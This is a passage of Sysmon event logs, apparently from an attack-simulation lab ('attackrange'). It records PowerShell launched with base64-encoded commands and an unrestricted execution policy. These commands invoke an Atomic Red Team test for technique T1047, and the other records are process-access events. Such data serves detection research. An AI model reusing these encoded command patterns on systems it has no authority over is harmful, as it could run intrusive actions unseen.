JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.266","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","ParentProcessId":"4652","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nSourceProcessId: 4652\r\nSourceThreadId: 2952\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152B8890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","SourceProcessId":"4652","SourceThreadId":"2952","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152B8890)","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 